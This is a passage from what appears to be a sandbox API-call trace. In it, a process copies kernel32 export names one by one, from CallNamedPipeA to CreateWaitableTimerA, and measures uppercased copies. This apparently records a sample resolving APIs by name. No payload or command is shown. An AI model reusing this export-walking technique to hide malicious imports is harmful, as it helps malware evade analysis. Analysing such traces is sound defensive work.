lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0083.545] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0083.545] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0083.546] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0083.546] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0083.546] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0083.546] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0083.546] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0083.546] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0083.546] lstrlenA (lpString="CANCELIO") returned 8 [0083.546] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0083.546] lstrlenA (lpString="CANCELIOEX") returned 10 [0083.546] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0083.546] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0083.546] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0083.546] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0083.546] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0083.546] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0083.546] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0083.546] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0083.546] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0083.546] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0083.546] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0083.546] lstrlenA (lpString="CHECKELEVATION") returned 14 [0083.546] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0083.546] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0083.546] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0083.546] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0083.546] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0083.546] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0083.546] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0083.546] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0083.546] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0083.546] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0083.546] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0083.546] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0083.546] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0083.546] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0083.546] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0083.547] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0083.547] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0083.547] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0083.547] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0083.547] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0083.547] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0083.547] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0083.547] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0083.547] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0083.547] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0083.547] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0083.547] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0083.547] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0083.547] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0083.547] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0083.547] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0083.547] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0083.547] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0083.547] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0083.547] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0083.547] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0083.547] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0083.547] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0083.547] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0083.547] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0083.547] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0083.547] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0083.547] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0083.547] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0083.547] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0083.547] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0083.547] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0083.547] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0083.547] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0083.547] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0083.547] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0083.547] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0083.548] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0083.548] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0083.548] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0083.548] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0083.548] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0083.548] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0083.548] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0083.548] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0083.548] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0083.548] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0083.548] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0083.548] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0083.548] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0083.548] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0083.548] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0083.548] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0083.548] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0083.548] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0083.548] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0083.548] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0083.548] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0083.548] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0083.548] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0083.548] lstrlenA (lpString="COPYCONTEXT") returned 11 [0083.548] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0083.548] lstrlenA (lpString="COPYFILEA") returned 9 [0083.548] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0083.548] lstrlenA (lpString="COPYFILEEXA") returned 11 [0083.548] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0083.548] lstrlenA (lpString="COPYFILEEXW") returned 11 [0083.548] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0083.548] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0083.548] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0083.548] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0083.548] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0083.548] lstrlenA (lpString="COPYFILEW") returned 9 [0083.548] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0083.549] lstrlenA (lpString="COPYLZFILE") returned 10 [0083.549] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0083.549] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0083.549] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0083.549] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0083.549] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0083.549] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0083.549] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0083.549] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0083.549] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0083.549] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0083.549] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0083.549] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0083.549] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0083.549] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0083.549] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0083.549] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0083.549] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0083.549] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0083.549] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0083.549] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0083.549] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0083.549] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0083.549] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0083.549] lstrlenA (lpString="CREATEEVENTA") returned 12 [0083.549] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0083.549] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0083.549] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0083.549] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0083.549] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0083.549] lstrlenA (lpString="CREATEEVENTW") returned 12 [0083.549] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0083.549] lstrlenA (lpString="CREATEFIBER") returned 11 [0083.549] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0083.549] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0083.549] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0083.549] lstrlenA (lpString="CREATEFILEA") returned 11 [0083.550] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0083.550] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0083.550] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0083.550] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0083.550] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0083.550] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0083.550] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0083.550] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0083.550] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0083.550] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0083.550] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0083.550] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0083.550] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0083.550] lstrlenA (lpString="CREATEFILEW") returned 11 [0083.550] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0083.550] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0083.550] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0083.550] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0083.550] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0083.550] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0083.550] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0083.550] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0083.550] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0083.550] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0083.550] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0083.550] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0083.550] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0083.550] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0083.551] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0083.551] lstrlenA (lpString="CREATEJOBSET") returned 12 [0083.551] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0083.551] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0083.551] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0083.551] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0083.551] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0083.551] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0083.551] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0083.551] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0083.551] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0083.551] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0083.551] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0083.551] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0083.551] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0083.551] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0083.551] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0083.551] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0083.551] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0083.551] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0083.551] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0083.551] lstrlenA (lpString="CREATEPIPE") returned 10 [0083.551] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0083.551] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0083.551] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0083.551] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0083.551] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0083.551] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0083.551] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0083.551] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0083.551] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0083.551] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0083.551] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0083.551] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0083.551] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0083.551] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0083.551] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0083.552] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0083.552] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0083.552] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0083.552] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0083.552] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0083.552] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0083.552] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0083.552] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0083.552] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0083.552] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0083.552] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0083.552] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0083.552] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0083.552] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0083.552] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0083.552] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0083.552] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0083.552] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0083.552] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0083.552] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0083.552] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0083.552] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0083.552] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0083.552] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0083.552] lstrlenA (lpString="CREATETHREAD") returned 12 [0083.552] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0083.552] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0083.552] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0083.552] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0083.552] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0083.552] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0083.552] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0083.552] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0083.552] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0083.552] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0083.552] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0083.553] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0083.553] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0083.553] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0083.553] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0083.553] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0083.553] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0083.553] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0083.553] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0083.553] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0083.553] lstrcpyA 